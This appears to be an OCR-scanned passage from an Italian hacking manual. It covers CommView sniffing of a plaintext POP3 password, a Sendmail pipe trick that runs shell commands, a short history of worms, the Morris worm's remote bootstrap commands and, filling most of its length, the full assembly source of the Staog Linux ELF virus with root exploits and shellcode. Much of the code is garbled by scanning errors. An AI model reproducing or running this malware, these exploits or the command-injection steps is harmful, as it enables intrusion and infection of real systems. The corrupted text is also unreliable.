possono coprire tutte quelle in cui l'analisi dei dati passanti sul segmento di rete al quale la 
nostra macchina è collegata è di fatto una delle cose essenziali. 
Quali attività vi direte voi ? 

Prendete ad esempio il caso in cui lo sniffino possa servire a scoprire delle password digitate 
da altri utenti della vostra rete. 

Alcuni pacchetti come LC3, il famoso pacchetto adatto all'individuazione delle passwords, 
dispongono tra le altre metodologie quella relativa allo sniffing delle passwords stesse. 
Un altro esempio è quello in cui si cerca di emulare i funzionamenti delle barre pubblicitarie. 
Supponiamo di voler analizzare l'handshake di una di quelle barrette come ad esempio quella 
di PAYLAND. 

Attivate COMMVIEW e subito dopo lanciate il software che gestisce la barra. 



E 300 MODELLI D 




A questo punto richiediamo di farci posizionare sul primo pacchetto relativo alla connessione 
eseguita dalla barra con il suo server. 
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CommView come abbiamo detto prima possiede un opzione mediante la quale, nel caso di 
connessione TCP, è in grado di ricostruire l'intera sessione. 

Richiediamo appunto al ricostruzione e vedremo tutto quello che i due programmi, il client e il 
server, si sono scambiati. 

CommView permette di vedere in diversi formati questi dati anche se in questo caso il modo 
migliore è sicuramente quello esadecimale. 
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I dati riportati in forma testale sono : 
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OxOOAO 
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43 
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La password ad esempio risulta evidente ovvero iycdbb. 

Sempre lo sniffing permette di individuare un dialogo fatto con il mail server sempre in 
funzione dell'uso della barra pubblicitaria. 



+OK mail.wsbsitek.it Merak 4.2.3 P0P3 Fri, 


15 Mar 2002 09:33:09 +0100 


<20020315093309@mail . websitek . it> 




USER flavio2000 




+OK flavio2000 




PASS iycdbb 




+OK 0 messages 0 octets 




STAT 




+OK 0 0 




QUIT 




+OK mail.websitek.it closing connection 




GET /banner/ 3221024 .txt HTTP/ 1.1 




User-Agent : My Session 




Host : www.payland.it 




Connection : Keep-Alive 




Cache-Control : no-cache 




HTTP/1.1 404 Not Found 




Date: Fri, 15 Mar 2002 09:26:59 GMT 




Server : Apache/ 1 .3.19 (Unix) 




Connection: dose 




Transfer-Encoding: chunked 




Content-Type : text/html; charset=iso-8859- 


■1 


140 




<!DOCTYPE HTML PUBLIC " —/ / IETF//DTD HTML 2 . 0//EN"> 


<HTML><HEAD> 




<TITLE>404 Not Found</ TI TLE> 




</ HEAD> <BOD Y> 




<Hl>Not Found</Hl> 




The requested URL /banner/ 3221024 .txt was 


not found on this 


server . <P> 




<HR> 




<ADDRESS>Apache/l .3.19 Server at <A 




HREF= "mailto : info@payland. it " >www . payland . 


it</A> Port 80</ADDRESS> 


</BOD Y> </HTML> 





Il discorso comunque è questo. 

Uno sniffer per essere valido deve avere la possibilità di riuscire a intercettare i dati ma allo 
stesso tempo se dispone anche delle caratteristiche di CommView allora è qualche cosa di 
più. 

Il fatto di riuscire a ricostruire le sessioni è una caratteristica fantastica in quanto permette di 
analizzare tutti i dialoghi avvenuti su una rete eseguiti da qualsiasi pacchetto che questo sia 
una protezione software che una semplice client di email. 

Tutte le caratteristiche viste fanno di CommView uno degli strumenti indispensabili per 
chiunque lavori sui protocolli di rete indipendentemente dal lato su cui questo stia, hacker o 
amministratore di rete. 

Ultimamente COMMVIEW dispone di un ulteriore caratteristica e precisamente quella di poter 
creare pacchetti comprensibili da wlnject il programma per l'iniezione di pacchetti in rete. 
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Un altro problema legato a Sendmail 

Il metodo di inserire manualmente i dati all'interno di un server mail potrebbe causare diversi 

problemi, chiaramente legati all'hacking, nel caso in cui si tratti di Sendmail. 

L'uso delle pipe con Sendmail costituisce uno dei maggiori problemi di sicurezza legati a dei 

servers. 

Questo tipo di vulnerabilità costringe Sendmail a eseguire dei comandi con priviligeio di bin. 
Sempre con netcat o telnet collegato alla porta 25 digitate : 

helo 

mail from: | 
rcpt to: bounce 
data 

mail from: bin 

rcpt to: | sed '1,/ A $/d' | sh 



Qualsiasi comando dopo data verrà eseguito. 



WORM 

Un worm è un programma che distribuisce se stesso in un ambito di sistemi distribuiti. 

Detto in altre parole si tratta di un programma in grado di replicarsi e che non dipende 

dall'esistenza di qualsiasi altro software d'host particolare. 

Se vogliamo dare un'altra definizione a quella del worm potremmo dire che si tratta di un 
programma in grado di copiare se stesso da un sistema ad un altro. 

Al contrario dei semplici virus il worm è un programma autosufficiente ovvero in grado di 
esistere senza avere la necessità di iniettarsi dentro a qualche altro programma esistente. 
Di fatto quest'argomento non costituisce un parte importante di questo volume dato che 
personalmente non li considero programmi degni di nota se non per i meccanismi che 
possiedono per la loro replicazione. 

Sicuramente quest'ultimo argomento costituisce l'unico punto d'interesse nei confronti di 
questo tipo di software in quanto spesso questi adottano le classiche tecniche utilizzate 
.manualmente dagli hackers per copiare files da un sistema ad un altro. 
Prendiamo ad esempio dei worms come ad esempio NIMBDA. 

Questo utilizza il bugs che sicuramente in questi ultimi anni ha rappresentato il punto 
maggiormente vulnerabile dei sistemi WEB e precisamente quello definito con il termine di 
UNICODE BUG legato al controllo trasversale. 

Purtroppo in alcuni casi esiste la necessità di supportarsi su questi sistemi per arrivare ad un 
sistema vittima. 

Prendiamo ad esempio alcuni tipi di sniffer che abbiamo visto come sorgenti all'interno dei 
capitoli in cui venivano trattati questi argomenti. 

Software come Altivore devono essere posizionati all'interno dei sistemi che devono essere 
sniffati. 

In questo caso il fatto di arrivare a presenziare all'interno del sistema vittima non possiede un 
importanza vitale. 

Utilizzando alcuni meccanismi d'infezione ereditato dai worms è possibile fare arrivare il 
sistema di sniffing sul sistema remoto senza necessariamente entrarci dentro. 
Essendo un pacchetto destinato a Linux è sicuramente più complesso arrivare allo scopo in 
quanto su questo sistema operativo alcuni tipi di operazioni sono sicuramente più complicate. 
Sono tra i worms più conosciuti quelli che seguono, presentati per data : 



Nel 1 980, Shock e Hepps condussero esperimenti sui worms. Questo worm fu uno dei primi a 
possedere la capacità di propagarsi tra un host ed un altro. 

CHRISTMA EXEC 

Un altro dei primo worm fu questo. Scritto in REXX pretendeva che l'utente lo esreguisse in 
modo coscente direttamente dalle mail infettate. Chiaramente eravamo sempre a livello di 
sperimentazione. 
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Internet worm 

Siamo a novembre del 1988 anno in cui venne rilasciato questo worm. 



IRC worms 

Dicembre 1987. Fu il primo worm basato su IRC. 



Happy99 

Gennaio 1999, scritto da uno conosciuto con il nome di Spanska. Il worm funzionava 
sovvertendo il sottosistema IP di Windows 95 ed era in grado di riconoscere l'email SMTP. 

Melissa 

Melissa venne messo in circolazione a marzo del 1999. Il sistema attaccava I documenti 
WORD. 

ExplorerZip 

ExplorerZip è datato luglio 1999. Si attaccava alle email. 



Kak 

Febraio 2000 



LoveLetter 

Maggio 2000. Il worm si inviava a qualsiasi indirizzo presente all'interno dell'indirizziario 
Outlook. 

Le tecniche più importanti usate dai WORMS per la loro propagazione su un rete LAN sono : 
Condivisioni di rete non protette 

Condivisione di risorse protette (mediante individuazione delle passwords). 
Dischi già connessi alla rete e quindi copia tramite lettere identificativo dei dischi. 
Sistema interno di gestione delle mail. 



Per quanto riguarda invece le reti WAN il metodo essenziale di trasferimento è stato senza 
ombra di dubbio il sistema email. 

In ogni caso un sistema funzionale di replicazione di un WORM potrebbe essere in grado di 
sfruttare qualsiasi dei seguenti servizi di rete : 



HTTP (HyperText Transfer Protocol) 

FTP (File Transfer Protocol) 

IRC (Internet Relay Chat) 

DNS (Domain Name Service) 

Drive sharing 
Email 

Packet routing 

Al fine di vedere i meccanismi di replicazione riporto i sorgenti di alcuni sistemi, il primo per 
ambiente Linux. 



# 
# 



# 
# 



S T A O G 

yo ho. . welcome to yet another attempt at the 
impossible and improbable. This virus is a fully 
resident linux elf infector . It will infect files 
on execute regardless of who executed them. 
It achieves this by hacking root via 3 separate 
exploits and installing itself in the kernel. It leaves 
no trace of itself in drop files or other noticable 
locations but contains no stealth of any type. 

This is not a script virus. It is written in 100% 
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# 
# 



gcc vlrcode . s -o vircode 
strip vircode 

The filesize should be 4744 bytes . If not put the filesize 
in the .long at 'filesize : ' and recompile and strip. 
Then execute to instali . After installation the 
generated binary will automatically be deleted. 

For some reason this virus will only work on ELF machines 
running the 1 .2 .13 kernel . 

QUANTUM / V L A D 



§ +- 



. text 

. global vircode 
vircode : 

pushl $0 

pushl %ebp 

movi %esp, %ebp 

pusha 

movi $125, %eax 
movi $0x8000000, %ebx 
movi $0x4000, %ecx 
movi $7, %edx 
int $0x80 
cali recale 
recale: 

pop %edx 

subì $recalc, %edx 

leal vircode (%edx) , %eax 

movi %eax, 4 ( %ebp) 

movi $11, %eax 
movi $0x666, %ebx 
int $0x80 
emp $0x667, %ebx 
jnz goresident 
jmp ret2host 
goresident : 

movi 12 (%ebp) , %ebx 

xorl %ecx, %ecx 

movi $5, %eax 

int $0x80 

or %eax, %eax 

js ohfuck 

movi %eax, %ebx 

movi $19, %eax 

movi $vircode-main, %ecx 

subì filesize (%edx) , %ecx 

pushl %edx 

movi $2, %edx 

int $0x80 

popi %edx 

subì filesize (%edx) , %esp 

movi $3, %eax 
movi %esp, %ecx 
pushl %edx 

movi filesize (%edx) , %edx 
int $0x80 
popi %edx 



# start of the virus 

# entry point 

# setup stack frame 

§ save ali regs 

# mate cs writable 



# dynamic relocation 



# store entrypoint 



# are we already resident 



§ open argv[0] 



seek to vircode 



# read in vircode 



movi $6, %eax 
int $0x80 



# dose argv 
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movi $5, %eax 


# open tmp name for virus body 


X fcrd X vaxlioiile ( «BUA / / o tzxJJi 




movi $577, %ecx 




pushl %edx 




movi $448, %edx 




int $0x80 




popi %edx 




movi %eax, %ebx 




movi $4, %eax 


§ write vircode 


movi %esp, %ecx 








movi flleslze ( %edx) , %edx 




int S0x80 




popi %edx 




movi $6, %eax 


§ dose tmp 


int $0x80 




addi filesize (%edx) , %esp 




movi S2 %eax 


§ fork 


int $0x80 




ori %eax, %eax 




jne ret2host 




movi $36, %eax 


# sync 


int $0x80 




leal virname (%edx) , %ebx 


# exec the virus 


leal virargs (%edx) , %ecx 




movi %ebx, (%ecx) 




movi 8 ( %ebp) , %eax 




shll $2, %eax 




leal 1 6 (%ebp) , %edx 




addi %eax, %edx 




movi $11, %eax 




int $0x80 




movi $1 , %eax 




int $0x80 




# return to host 




ret2host : 




movi 12 (%ebp) , %ebx 


# open argv[0] 


xorl %ecx, %ecx 




movi $5, %eax 




int $0x80 




or %eax, %eax 




js ohfuck 




movi %eax, %ebx 




movi %esp, %edi 


# allocate space for return frame 


subì $endstackexecode-stackexecode+50, %edi 


leal stackexecode (%edx) , %esi 


# copy return frame to stack 


movi $endstackexecode-stackexecode, %ecx 


pushl %edi 




rep 




movsb 




movi $19, %eax 


§ move to originai bytes in argv[0] 


movi $vircode-main, %ecx 




pushl %edx 




movi $2, %edx 




int $0x80 




popi %edx 




movi $3, %eax 


# ready to read in org bytes 


leal vircode (%edx) , %ecx 




movi $main-vircode, %edx 




ret 


# goto return frame 
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ohfuck : 






movi $1 , %eax 






int $0x80 






stackexecode : 




# executed on the stack 


ini- èOirRCì 


ir 


XcLI tr -L Ve \J J- X y X Ilo. _L i/Jr L. tr O 


movi $6, %eax 






int $0x80 


# 


dose file handle 


nona 


# 


restore ali registers 


pop %ebp 


# 


restore stack 


ret 


# 


return to host 


endstackexecode : 






filesize : 






.long 4744 






st: 






. long 0 






virname : 






string " /tmp/hookup" 






virargs : 






. long 0 






. long 0 






.string "Staog by Quantum / VLAD" 






. global main 






main : 






movi %esp, %ebp 






movi $11, %eax 


# 


are we already resident ? 


movi $0x666, %ebx 






int $0x80 






cmp $0x667 , %ebx 






jnz goresidentl 






jmp tmpend 






goresidentl : 






movi $125, %eax 


# 


make cs writable 


movi $0x8000000, %ebx 






movi $0x4000, %ecx 






movi $7, %edx 






int $0x80 






movi $130, %eax 


# 


get num kernel syms 


movi $0, %ebx 






int $0x80 






shll $6, %eax 






subì %eax, %esp 






movi %esp, %esi 






pushl %eax 






movi %esi, %ebx 


# 


get kernel syms 


movi $130, %eax 






int $0x80 






pushl %esi 






nextsyml : 




# find symbol 


movi $thissyml, %edi 






push %esi 






addi $4, %esi 






cmpb $95, (%esi) 






jnz notuscore 






incl %esi 






notuscore : 






cmp si 






cmp si 






pop %esi 






jz foundsyml 






addi $64, %esi 
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foundsyml : 






movi (%es±) , %esi 






movi %esi, current 






popi %esl 






pushl %esl 






nextsym2 : 




# find symbol 


movi $thissym2, %edl 






push %esl 






addi $4, %esl 






cmpsl 






cmpsl 






pop %esi 






jz foundsym2 






addi $64, %esi 






jmp nextsym2 






foundsym2 : 






movi (%esl) , %esl 






movi %esl, kmalloc 






popi %esl 






xorl %ecx, %ecx 






nextsym: 




# find symbol 


movi $thlssym, %edi 






movb $15, %cl 






push %esl 






addi $4, %esl 






rep 






cmpsb 






pop %esi 






jz foundsym 






addi $64, %esi 






jmp nextsym 






X \J UiiuO Vili . 






movi (%esl) , %esl 






pop %eax 






addi %eax, %esp 






movi %esl, syscalltable 






xorl %edi, %edl 






uuciiuc v JviJitriii . 






movi $devkmem, %ebx 


§ open 


/dev/kmem 


movi $2, %ecx 






cali openflle 






ex x o eoA f o caA 






js haxorroot 






movi %eax, %ebx 






X CTCX X li | o fcr o X / / o cL-A 






sys_call_tajble f sys_execve 7 






cali seeJcfilestart 






movi Jorgexecve, %ecx 


§ read 


in execve pointer 


movi $4, %edx 






cali readflle 






leal 488 (%esl) , %ecx 


# 


seeJc to sys_call_table [SYS_uname] 


cali seekfllestart 






movi $taskptr, %ecx 


# read 


in sys_call_table [SYS_uname] 


movi $4, %edx 






cali readflle 






movi taskptr, %ecx 


# seek to uname code 


cali seekfllestart 
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movi 


%esp, %ecx 


# 


read in org uname bytes 


movi 


$endhookspace-hookspace, %edx 






cali 


readfile 






movi 


taskptr, %ecx # seek to uname code 


cali 


seekfllestart 






movi 


fileslze, %eax 


# 


amount to alloc 


addi 


$vlrend-vlrcode, %eax 






movi 


%eax, vlrendvlrcodeflleslze 






movi 


$hookspace, %ecx # wrlte our code 


movi 


$endhookspace-hookspace, %edx 






cali 


wrlte file 






movi 


$122, %eax 


# 


cali uname to alloc some space 


int $0x80 






movi 


%eax, codeto 






movi 


taskptr, %ecx 


# 


seek to uname code 


cali 


seekfllestart 






movi 


%esp, %ecx 


# 


write org uname bytes 


movi 


$endhookspace-hookspace , %edx 






cali 


wrlte file 






addi 


$endhookspace-hookspace , %esp 






subì 


$aftreturn-vlrcode, orgexecve 






movi 


codeto, %ecx 


JT 


OCCJV t~ l_/ VU1 J- CI 


subì 


%ecx, orgexecve 






cali 


seekfllestart 






movi 


$vlrcode, %ecx 


M 

n 


r«r*"ì ^ — f\ Tri v /"(/^y^^s 

WJ. i Le viicoue 


movi 


$vlrend-vircode , %edx 






cali 


wrlte file 






subì 


filesize, %esp 


# 


read in virus 


pushl %ebx 






movi 


8 (%ebp) , %ebx 






movi 


(%ebx) , %ebx 






xorl 


%ecx, %ecx 






cali 


open file 






movi 


%eax, %ebx 






leal 


4 ( %esp) , %ecx 






movi 


filesize, %edx 






cali 


readfile 






cali 


closefile 






popi 


%ebx 






movi 


%esp, %ecx 


# 


write virus to end of alloc space 


movi 


filesize, %edx 






cali 


writefile 






addi 


filesize, %esp 






leal 


44 (%esi) , %ecx 


# 


seek to sys_call_table [SYS_execve] 


cali 


seekfllestart 






addi 


$newexecve-vircode , codeto 






movi 


$codeto, %ecx 


# 


write pointer to execve handler 


movi 


$4, %edx 






cali 


writefile 
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tmpend : 






movi 8 (%ebp) , %ebx 


# 


rm argv[0] 


movi ( %ebx) , %ebx 






/— r a 7 7 t~tyi ~f~ i 7 a 






cali exit 






openflle : 






movi $5, %eax 






J.UL. ipUJtOU 






ret 






closefile: 






movi $6, %eax 






ini- èOirRCì 






ret 






readfile : 






movi $3, %eax 






ini- èOirftn 






ret 






writefile: 






movi $4, %eax 






Int $0x80 












seekfllestart : 






movi $19, %eax 






xorl %edx, %edx 






int $0x80 






ret 






rmfile : 






movi $1 0, %eax 






int $0x80 












exit : 






xorl %eax, %eax 






incl %eax 






int $0x80 






waitchild: 






iiJU VI y / f otidA 






movi $-1, %ebx 






movi $st, %ecx 






xorl %edx, %edx 






int $0x80 






ret 






haxorroot : 




# this routine makes /dev/kmem 


a+wr 






empi $3, %edi 






jz ret2host 






movi $2, %eax 


# 


fork () 


int $0x80 






ori %eax, %eax 


# 


are we the child or parent 


jnz parent 






xorl %ebx, %ebx 


# 


dose stdin 


cali closefile 






movi $1, %ebx 


# 


dose stdout 


cali closefile 






movi $2, %ebx 


# 


dose stderr 
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empi $1 , %edi 


# try sploit 1 


jz sploltl 




empi $2, %edi 


# try sploit 2 


jz splolt2 




movi $2, %eax 


§ try sploit 3 


Int $0x80 


# fork 


ori %eax, %eax 




jne notcl 




movi $2, %eax 


# fork 


int $0x80 




ori %eax, %eax 




jne notc2 




movi $4,r 




jmp allgo 




notc2: 




cali waitchild 


# wait for child 


movi $8, r 




jmp allgo 




notcl : 




cali waitchild 


# wait for child 


movi $0, r 




allgo: 




subì $1 029, %esp 


# allocate space for egg 


mov %esp, %edi 




movi $1028-60, %ecx 




subì r, %ecx 




movb $0x90, %al 


# add nops to egg 


rep 




stosb 




movi $execshell, %esi 


# add shell to egg 


movi $60, %ecx 




rep 




movsb 




movi %esp, %eax 


§ add return address 


addi $1200, %eax 




stosl 




xorl %eax, %eax 




stosb 




UUJ VX yil^ o creici 




movi $mountpath, %ebx 




movi $args, %ecx 




movi %esp, 4 ( %ecx) 




movi $env, %edx 




int $0x80 




cali exit 




execshell : 




. string 




" \xeb \x21 \x5b \x31 \xc9 \x66\xb9 \. 


Xff\x01\x31\xc0\x88\x43\x09\x88\x43\xl4\xb0\x0 


f\xcd\x80 \x31 \xcO \xbO \xOa \x8d\x5b \xOa \xcd\x80 \x33 \xcO \x40\xcd\x80 \xe8 \xda \xf 


f\xff\xff/dev/kmemx/etc/mtab~ " 




mountpath : 




. string " / sbin/mount " 




r: 

. long 0 




args : 




. long mountpath 




. long 0 




. long 0 




env: 




. long 0 




dipname : 




. string "/tmp/t . dip " 




execthis : 




.string "/bin/sh" 




parml : 
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pathdlp: 






. strlng "/sbln/dlp /tmp/t. 


dip" 




argsl : 






. long execthls 






. long panai 






. long pathdlp 






. long 0 






chkey: 






. strlng "chatkey " 






hsname : 






.strlng "/tmp/hs" 






hsdat : 






.strlng " # ! /bin/ sh\nchmod 


666 /dev/kmem\n" 


shell : 






. strlng 






"\xeb\x24\x5e\x8d\xle\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f\xb8\xlb\x5 


6\x34 \xl2 \x35 \xl 0 \x56\x34 \x!2\. 


x8d\x4e \xOb \x8b \xdl \xcd\x80 \x33 \xcO \x40\xcd\x8 


0 \xe8 \xd7\xff\xff\xff /tmp/hs " 




sploltl : 






subì $1024, %esp 




§ allocate space for egg 


movi %esp, %edl 






movi $chkey, %esl 




§ add "chatkey " to egg 


movsl 






movsl 






movi %esp, %eax 






subì $224, %eax 




§ add return address to egg 


movi $34, %ecx 






rep 






stosl 






movi $512-144, %ecx 




# add nops to egg 


movb $0x90, %al 






rep 






stosb 






movi $ shell, %esi 




§ add shell to egg 


movi $50, %ecx 






rep 






movsb 






movi $1 0, %al 




§ add \n to egg 


stosb 






movi $dlpname, %ebx 




§ create dip script 


movi $577, %ecx 






movi $448, %edx 






cali openflle 






movi %eax, %ebx 






movi %esp, %ecx 






pushl %edx 






movi $562, %edx 




§ write script code 


cali writefile 






popi %edx 






cali closeflle 






movi $hsname, %ebx 




# create shell file to execute 


movi $577, %ecx 






movi $448, %edx 






cali openflle 






movi %eax, %ebx 






movi $hsdat, %ecx 






movi $30, %edx 






cali writefile 




# write shell contents 


cali closeflle 






movi $2, %eax 




# fork 


int $0x80 






ori %eax, %eax 






jne pi 






movi $execthis , %ebx 




§ execute sploit 


movi $argsl , %ecx 






movi 12 (%ebp) , %edx 






movi $11, %eax 
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Cali exit 






pi : cali waitchild 


# wait for sploit to finish 




movi $dipname, %ebx 


§ remove dip script 




cali rmfile 






movi $hsname, %ebx 


# remove shell script 




cali rmfile 






cali exit 






perlname i 






. string "/tmp/b " 






perldat : 






. string 


"# ! /usr/bin/suidperl 




U\n$ENV{PATH}=\ " /bini /usr/bin\ 


"; \n$>=0; $<=0; \nexec (\ "chmod 


666 


/dev/kmem\ ") ; \n" 






perlargs : 






. long perlname 






perlenv: 






. long 0 






sploit2 : 






movi $perlname, %ebx 


# create peri script 




movi $577, %ecx 






movi $488, %edx 






cali openfile 






movi %eax, %ebx 






movi $perldat , %ecx 


# write peri contents 




movi $91, %edx 






cali writefile 






movi $94, %eax 






movi $2496, %ecx 






int $0x80 






cali closefile 






movi $2, %eax 


# fork 




int $0x80 






ori %eax, %eax 






jne p2 






movi $11, %eax 


# execute the sploit 




movi $perlname, %ebx 






movi $perlargs, %ecx 






movi $perlenv, %edx 






Irti- S0x80 






cali exit 






P 2: 






cali waitchild 


# wait for the child 




movi $perlname, %ebx 


# remove peri script 




cali rmfile 






cali exit 






parent : 






incl %edi 






cali waitchild # wait for child process to finish 




jmp opendevkmem 






taskptr: 






. long 0 






otaskptr: 






. long 0 






codeto : 






. long 0 






thissym: 






.string "sys_call_table" 
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. string "current " 




th±ssym2 : 




.strìng "kmalloc" 




devkmem : 




.string "/dev/kmem" 




e_ entry : 




. long 0x666 




ìnfect : 


# opens and Infects the file in 


%ebx 




pushl $2 


# open %ebx 


pushl %ebx 




cali 5*4(%ebp) 




popi %ebx 




popi %ebx 




ori %eax, %eax 


# make sure it ' s opened 


js el 




movi %eax, %ebx 




push %fs 




push %ds 




pop %fs 




leal e_entry (%edi) , %ecx 


# read in elf hdr marker 


movi $4, %edx 




pushl %edx 




pushl %ecx 




pushl %ebx 




cali 3*4(%ebp) 




addi $12, %esp 




empi $0x464c457f, e_entry (%edi) 


# make sure it ' s elf 


jnz e2 




pushl $0 


§ seek to entrypoint Storage 


pushl $24 




pushl %ebx 




cali 19*4 (%ebp) 




addi $12, %esp 




leal e_entry (%edl) , %ecx 


# read the entrypoint 


pushl $4 




pushl %ecx 




pushl %ebx 




cali 3*4(%ebp) 




addi $12, %esp 




andl $Oxffff,e_entry(%edi) 




movi e_entry ( %edl) , %ecx 


§ seek to entrypoint 


pushl $0 




pushl %ecx 




pushl %ebx 




cali 19*4 (%ebp) 




popi %eax 




popi %eax 




popi %eax 




subì $maln-vircode, %esp 


# allocate space on the stack 


movi %esp, %esl 




pushl $maln-vlrcode 


# read in host bytes 


pushl %esi 




pushl %ebx 




cali 3*4(%ebp) 




addi $12, %esp 




movi vlrcode (%edl) , %eax 




empi %eax, (%esl) 


# check if file infected 


jz e3 




pushl $2 


# seek to end of file 


pushl $0 




pushl %ebx 
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addi $12, %esp 






movi flleslze (%edl) , %eax 






pushl %eax 






leal vlrend ( %edl) , %eax 




# write virus body to end 


pushl %eax 






pushl %ebx 






cali 4*4(%ebp) 






addi $12, %esp 






pushl $2 




# seek to end of file 


pushl $0 






pushl %ebx 






cali 19*4 (%ebp) 






addi $12, %esp 






pushl $maln-vlrcode 


# 


write org bytes 


pushl %esl 






pushl %ebx 






cali 4*4(%ebp) 






addi $12, %esp 






movi e_entry ( %edl) , %ecx 




# seek to entrypoint 


pushl $0 






pushl %ecx 






pushl %ebx 






cali 19*4 (%ebp) 






addi $12, %esp 






leal vlrcode (%edl) , %ecx 




# write virus 


pushl $maln-vlrcode 






pushl %ecx 






pushl %ebx 






cali 4*4(%ebp) 






addi $12, %esp 






e3: 






addi $main-vircode, %esp 


# 


deallocate space off stack 


e2: 












pushl %ebx 






cali 6*4(%ebp) 




# dose file 


popi %eax 






cali 36*4 (%ebp) 




# sync 


el: 






ret 






uidsave: 






word 0 






euldsave : 






. word 0 






suldsave : 






. word 0 






f suldsave: 






. word 0 






gldsave: 






woird 0 






egldsave : 






. word 0 






sgldsave : 






. word 0 






f sgldsave : 






. word 0 






saveuids : 






movi current (%edi) , %eax 






movi ( %eax) , %eax 






leal 0x31 0 (%eax) , %esi 






pushl %edl 






leal uldsave (%edi) , %edi 






movi $4, %ecx 






rep 
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popi %edi 






ret 






makeroot : 






movi current (%edi) , %eax 






movi ( %eax) , %eax 






pushl %edl 












xorl %eax, %eax 






movi $4, %ecx 






rep 






stosl 






popi %edi 






ret 






loaduids : 






movi current (%edl) , %eax 






movi ( %eax) , %eax 






leal uldsave (%edl) , %esl 












leal 0x32 0 (%eax; , %edi 






movi $4, %ecx 






rep 






movsl 






popi %edl 






ret 






. global newexecve 






newexecve : 






pushl %ebp 






movi %esp, %ebp 






pushl %ebx 






movi 8 (%ebp) , %ebx 


# 


get the fllename to Infect 


pushal 






empi $0x666, %ebx 


# 


is this our servlce routine ? 


jnz notserv 






popal 






incl 8(%ebp) 


# 


yes . .ine the pointer and return 


popi %ebx 






popi %ebp 






ret 






notserv: 






cali rlngOrecalc 


# 


no. . calculate ring 0 delta 


ringOrecalc: 






popi %edl 






subì $rlngOrecalc , %edi 






movi syscalltable (%edl) , %ebp 


# 


put *sys_call_table in %ebp 


cali saveulds 


# 


save the callers uid/euid. . . 


cali makeroot 


# 


make the Caller root 


cali Infect 


# 


infect the file 


cali loadulds 


# 


restore the callers uid/euid. . . 


hookoff : 












popi %ebx 






popi %ebp 






.byte 0xe9 




# goto originai execve 


orgexecve : 






. long 0 






a ft return : 






syscalltable : 






. long 0 






current : 






. long 0 






. global hookspace 
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push %ebp 
pushl %ebx 
pushl %ecx 
pushl %edx 
movi %esp, %ebp 

pushl $3 
.byte 0x68 
vlrendvlrcodeflleslze : 
. long 0 

.byte 0xb8 # movi $xxx, %eax 

kmalloc : 



0 




cali 


%eax 


movi 


%ebp, %esp 


popi 


%edx 


popi 


%ecx 


popi 


%ebx 


popi 


%ebp 


ret 





. global endhookspace 
endhookspace : 




La seguente parte è presa dell' HOWTO della security legata al Linux. 
Descrizione dettagliata del Worm di Morris 

Il Worm è composto da 2 parti: un programma principale e un bootstrap o vector program. Il 
programma principale una volta stabilita la connessione con una macchina, cerca di reperire 
quante più informazioni possibili per il collegamento ad altre macchine, queste informazioni si 
possono trovare o controllando i file di configurazione, o eseguendo utility di rete presenti nel 
sistema; il Worm cerca poi di sfruttare i difetti precedentemente descritti: exploit shell, remote 
per eseguire il bootstrap in ogni macchina infettata. 

Il vector program è un programma di 99 linee scritto in codice C che deve essere compilato 
sulla macchina remota, in modo da poter infettare più architteture.il vector program dopo 
essere compilato viene lanciato con 3 parametri: 

IP della macchina vittima, il numero di porta della macchina attraverso cui si prende il main 
del Worm e un numero magico che viene usato per il trasferimento del main del Worm, 
Se il numero magico non viene ricevuto, il server si disconnette immediatamente dal vector 
program, perchè presuppone un possibile spoofing. 

Il programma quando riceve sulla linea di comando l'opzione image si forka creando una 
copia di se stesso; nel caso di trasferimento fallito vengono cancellati tutti i file trasferiti e 
l'esecuzione termina. 

Quando il bootstrap stabilisce la connessione su una macchina, cerca di connettersi al main e 
trasferire i file precompilati (del main) per quella particolare architettura, e per quella versione 
di sistema operativo, che rende dipendenti i programmi dalle librerie dinamiche. 
Una curiosa caratteristica che è rimasta ancora insoluta era il perchè il programma adibiva 
un'area di trasferimento di 20 file, se in realtà ne usava solo 3 .forse il Worm era stato 
pensato per poi essere ampliato e trasferire magari trojani e altre cose di questo genere. 
Una volta che il file binario è stato trasferito, il bootstrap carica il file lo linka con le librerie del 
sistema operativo, in modo da poterlo eseguire. 

Se l'esecuzione va a buon fine viene caricata una copia del bootstrap e dei file in memoria e 
vengono cancellate le copie su disco, altrimenti in caso di fallimento il bootstrap avrebbe 
cancellato le traccie dell'infezioni precedenti all'esecuzione del Worm. 

Approfondimento tecnico dell'esecuzione del Worm di Morris 

Scendiamo adesso un ulteriore gradino della nostra descrizione, in modo da affrontare il 
comportamento del Worm ad un livello più basso. 

La descrizione parte dal punto in cui almeno un hosts è infettato. A questo punto abbiamo un 
Worm che è in esecuzione su una macchina e riesce a stabilire una connessione TCP (finger, 
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SendMail, o altri exploit descritti precedentemente) in modo da spedire il bootstrap su un'altra 
macchina da infettare: 

Trasferimento da parte del Worm del bootstrap sulla macchina infettata 

Il programm vector dopo essere recapitato dal main del Worm su una macchina remota, 
viene installato ed eseguito dal Worm stesso attraverso 2 metodi principali: 
Se il Worm ha stabilito una connessione attraverso il comando rsh e quindi shell remota a 
questo punto vengono digitati i seguenti comandi su una singola riga: 

PATH=/bin:/usr/bin:/usr/ucb cd;/usr/tmp echo gorch49; sed Yint zz/q' > x14481910.c; echo 
gorch50 [testo del bootstrap] int zz; ce -o z1 4481 910 x1 4481 91 0.c;./x1 4481 910 
128.32.134.1632341 8712440; rm -f x1 4481 910 x1 4481 91 0.c; echo DONE; 

la visualizzazione della stringa DONE è l'avvertimento che il Bootstrap è in esecuzione. 

Se il Worm aveva trasferito il bootstrap tramite SendMail venivano dati le seguenti tre righe di 

comando debug mail from: 

rept to: <"!sed -e '1 ,/*$/'d! /bin/sh;exit 0"> data ed /usr/tmp cat > x1 4481 901 .e « 'EOF' [testo 
del bootstrap]EOF ce -0 x1 4481 91 0 x1 4481 91 0.c; x1 4481 91 0 1 28.32.1 34.1 6 32341 871 2440; 
rm -fx1 4481 91 0 x1 4481 91 0.c quit 

Il Worm aspetta poi poco più di due minuti in ascolto sulla porta designata che il vector 
program si metta in contatto. 

A questo punto viene stabilita una connessione sulla nuova macchina infettata tramite il 
programma di bootstrap e il Worm via socket (esempio33000) e viene costruita una stringa 
random( esempio 10846078 ) e un numero random (esempio 14490788) utlizzati per possibli 
anti-spoofing. 

Il programma vector dopo aver contattato il Worm invia la stringa random creata e scarica 3 
file: una versione binaria del Worm per Sun, una Versione per il Vax, e il codice sorgente del 
programma vector. Dopo aver trasferito i file il programma vector esegue una shell con la 
chiamata execl ancora connessa al Worm o main. 

Il Worm attraverso la shell appena aperta invia i seguenti comandi: 

PATH=/bin:/usr/bin:/usr/ucb rm -f sh 
